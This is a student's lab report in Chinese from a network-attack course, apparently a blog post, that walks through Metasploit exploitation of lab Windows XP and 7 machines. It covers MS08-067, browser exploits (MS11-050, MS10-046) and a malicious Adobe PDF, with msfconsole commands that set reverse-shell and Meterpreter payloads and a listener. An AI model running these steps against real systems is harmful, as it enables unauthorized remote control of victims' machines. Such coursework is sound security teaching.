20155308『网络对抗技术』Exp5 MSF基础应用
20155308『网络对抗技术』Exp5 MSF基础应用
一、原理与实践说明
实践内容
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
一个主动攻击实践,如ms08-067; (1分)
一个针对浏览器的攻击,如ms11-050;(1分)
一个针对客户端的攻击,如Adobe;(1分)
成功应用任何一个辅助模块。(0.5分)
以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除0.5分。
基础问题回答
- 用自己的话解释什么是
exploit
,payload
,encode
?
exploit
:Exploit 的英文意思就是利用,它在黑客眼里就是漏洞利用。有漏洞不一定就有Exploit(利用)。有Exploit就肯定有漏洞。payload
:病毒通常会做一些有害的或者恶性的动作。在病毒代码中实现这个功能的部分叫做"有效负载"(payload)。payload可以实现任何运行在受害者环境中的程序所能做的事情,并且能够执行动作包括破坏文件删除文件,向病毒的作者或者任意的接收者发送敏感信息,以及提供通向被感染计算机的后门。encode
:编码,编制成计算机语言
实践内容
目录
- 主动攻击:ms08_067漏洞攻击
- 对浏览器攻击:ms10_046漏洞攻击
- 对Adobe的漏洞攻击:adobe_toolbutton
- 尝试利用漏洞对win7系统进行攻击
Windows服务渗透攻击——MS08-067安全漏洞
攻击机:Kali(IP地址:192.168.91.135)
靶机: windows XP SP3(English)(IP地址:192.168.91.134)
在攻击机kali输入msfconsole
进入控制台,依次输入以下指令:
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) > show payloads
msf exploit(windows/smb/ms08_067_netapi) > set payload generic/shell_reverse_tcp
//tcp反向回连msf exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.91.135
//攻击机ipmsf exploit(windows/smb/ms08_067_netapi) > set LPORT 5308
//攻击端口msf exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.91.134
//靶机ip,特定漏洞端口已经固定msf exploit(windows/smb/ms08_067_netapi) > set target 0
//自动选择目标系统类型,匹配度较高msf exploit(windows/smb/ms08_067_netapi) > exploit
//攻击
- 建立会话,攻击成功结果如下:
针对浏览器的攻击:ms11_050
攻击机:kali (IP地址:192.168.91.135)
靶机:WindowsXP Professional sp2/Windows7专业版 (IP地址:192.168.91.136)
在攻击机kali输入msfconsole
进入控制台,依次输入以下指令:
msf > use windows/browser/ms11_050_mshtml_cobjectelement
info指令查看该模块的信息
- targets信息
- options信息
msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_tcp
//http反向回连msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.91.135
//攻击机ipmsf exploit(ms11_050_cobjectelement) > set LPORT 5308
//攻击端口固定msf exploit(ms11_050_cobjectelement) > set URIPATH baidu
//统一资源标识符路径设置set target 1
msf exploit(ms11_050_cobjectelement) > exploit
- 攻击成功后会有靶机需要访问的网址
- 但是不知道一直回连不成功,一直再试,也不知道为啥??看了我们小组长的博客,我学习了新的浏览器攻击方式,见下面。
对浏览器攻击:ms10_046漏洞攻击
- 用
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
使用该模块,再使用
show payloads
查看可以供我们使用的payload
:
- SRVHOST填的是本地监听主机的IP地址,LHOST也是监听的IP地址,所以这里SRVHOST和LHOST都应该填攻击机的IP地址:
- 使用exploit指令执行漏洞,可以看到生成了一个url:
- 使用exploit指令执行漏洞,可以看到生成了一个url:
- 在MSF终端看见漏洞执行成功:
针对Adobe Reader软件的渗透攻击——adobe_toolbutton
攻击机:kali
靶机:windowsXP Professional sp2
在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
先用
search adobe
得知此漏洞所在的模块
- 选择一个模块
- 用
show targets
查看可以被攻击的靶机的操作系统型号
msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp //tcp
反向回连msf exploit(adobe_cooltype_sing) > set LHOST 192.168.91.135
//攻击机ipmsf exploit(adobe_cooltype_sing) > set LPORT 5308
//攻击端口msf exploit(adobe_cooltype_sing) > set FILENAME 5308hwf.pdf
//设置生成pdf文件的名字msf exploit(adobe_cooltype_sing) > exploit
//攻击
- 找到5308hwf.pdf文件
- 将文件放到靶机上
在kali上进入监听模块,输入以下命令:
msf > use exploit/multi/handler
//进入监听模块msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
//tcp反向连接msf exploit(handler) > set LHOST 192.168.91.135
//攻击机ipmsf exploit(handler) > set LPORT 5308
//攻击端口固定msf exploit(handler) > exploit
- 发现已经获取了被攻击者权力,可以对其进行操作
- 若关闭pdf文件,则失去权限,攻击失败
成功应用任何一个辅助模块
- 输入命令show auxiliary查看所有辅助模块
- 选择其中一个即可
- 用指令info查看相关信息
- 进行扫描,结果如下图所示
实验中的问题
- 我在进行kali机的IP地址的查询时,正常的地址显示是这样的
- 但是总是出现eth0消失的情况:
针对这个问题,我之前的解决办法其一是关闭虚拟机,重新开一遍,地址就会正常了。其二就是重新安一下虚拟机,所以我的硬盘中虚拟机总是得备份。但是总是出现这个问题也不是办法,我相信有的同学也遇到过这个问题(不会只有我这么惨吧???)
解决:
一般是eth0被禁掉了,就只会显示127.0.0.1这个回环地址 你用
ifup eth0
ifconfig up eth0
上面两个命令都可以,然后 /etc/init.d/network restart
你就能看到eth0了。
- 下面这篇博客是解释“linux系统查看IP地址,不显示IP地址或者只显示127.0.0.1”原因及解决过程,可以参考一下。
https://blog.csdn.net/qq_36769100/article/details/71473632
实验感想
本次实验通过通过MSF的攻击模块对计算机进行各种攻击方法的实践,比前几次的攻击更加的系统化,同时攻击的方法更加深入。通过最后一个板块的研究,使我将学习理论知识转化为自我实践过程。
在其中某些模块的学习中,总是会有攻击不成功的地方,每当不成功,我就很懊恼,为啥总是很别人的不一样。但是在课上听到老师说,攻击不成功是很正常的事情,我突然感觉到了信心。然后通过查找学长学姐或是网上的解决方法,不断解决问题,最后成功,感觉很有成就感。
20155308『网络对抗技术』Exp5 MSF基础应用的更多相关文章
- 20165308『网络对抗技术』Exp5 MSF基础应用
20165308『网络对抗技术』Exp5 MSF基础应用 一.原理与实践说明 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实 ...
- 2017-2018-2 20155303『网络对抗技术』Exp5:MSF基础应用
2017-2018-2 20155303『网络对抗技术』Exp5:MSF基础应用 --------CONTENTS-------- 一.原理与实践说明 1.实践内容 2.预备知识 3.基础问题 二.实 ...
- 2017-2018-2 20155310『网络对抗技术』Exp5:MSF基础应用
2017-2018-2 20155310『网络对抗技术』Exp5:MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:由攻击者或渗透测试者利 ...
- # 2017-2018-2 20155319『网络对抗技术』Exp5:MSF基础应用
2017-2018-2 20155319『网络对抗技术』Exp5:MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:使用者利用漏洞进行攻击 ...
- 2017-2018-2 20155327『网络对抗技术』Exp5:MSF基础应用
2017-2018-2 20155327『网络对抗技术』Exp5:MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:使用者利用漏洞进行攻击 ...
- 20155308『网络对抗技术』Exp7:网络欺诈防范
20155308『网络对抗技术』Exp7:网络欺诈防范 原理与实践说明 1.实践目标 本实践的目标是:理解常用网络欺诈背后的原理,以提高防范意识,并提出具体防范方法. 2.实践内容概述 简单应用SET ...
- 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用
<网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...
- 2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ...
- 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...
随机推荐
- [Objective-C] Block实现回调和简单的学习思考
初识Block的时候,总觉得其很可怕,因为看不懂其运行原理,所以用起来总是觉得不安全.关于Block的语法,等我把手里的资料全部看完,整理好再发出来.这次先看看用Block怎么实现回调. 新博客:wo ...
- JS前端创建CSV或Excel文件并浏览器导出下载
长期以来,在做文件下载功能的时候都是前端通过ajax把需要生成的文件的内容参数传递给后端,后端通过Java语言将文件生成在服务器,然后返回一个文件下载的连接地址url.前端通过location.hre ...
- Android aapt 工具介绍(转)
目录 AAPT 工具介绍 AAPT 的帮助信息 查看AAPT的版本 使用AAPT列出资源包apk文件列表 使用AAPT打包资源文件 使用AAPT解压资源包apk 来自:http://mmmyddd ...
- Java J2EE读取配置文件
package com; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import javax.naming.InitialCon ...
- Keil下载时出现program fail错误的一个原因
在使用Keil给STM32单片机编程的时候有时会出现Programing Failed!对于这样的错误网上有很多的教程,错误的原因也有很多,比如是单片机上锁,环境配置错误的原因导致.这里我将提供一种错 ...
- MySQL索引选择不正确并详细解析OPTIMIZER_TRACE格式
一 表结构如下: CREATE TABLE t_audit_operate_log ( Fid bigint(16) AUTO_INCREMENT, Fcreate_time int(10) un ...
- 转:jQuery插件开发全解析
jQuery插件的开发包括两种: 一种是类级别的插件开发,即给jQuery添加新的全局函数,相当于给jQuery类本身添加方法.jQuery的全局函数就是属于jQuery命名空间的函数,另一种是对象级 ...
- 实现CTreeCtrl父子节点的联动选择
本文实现了下面的功能: 当选中父节点时, 其所有子节点全部选中. 当取消选中父节点时, 其所以子节点全部取消选中. 点击子节点时, 根据子节点与其兄弟节点的选中状态, 自动设置父节点的选中状态. 通过 ...
- 第六次作业 orm整合 接口
结合以前一个项目,将普通的jdbc进行了相关整合,全部改写成了hibernate接口 项目名称:短视频分享平台 主要功能:用户模块:注册.登录.编辑资料.查看用户相关 分类模块:分类添加.查看 视频共 ...
- C++类中的特殊成员函数-------复制构造函数
在C++中存在一个特殊函数,他就是复制构造函数,假如我们有类A,如果有A a;A b=a; 在这种情况下利用A类变量a来给同是A类变量的b来赋值,这个时候类会使用复制构造函数,如果我们不显式声明复 ...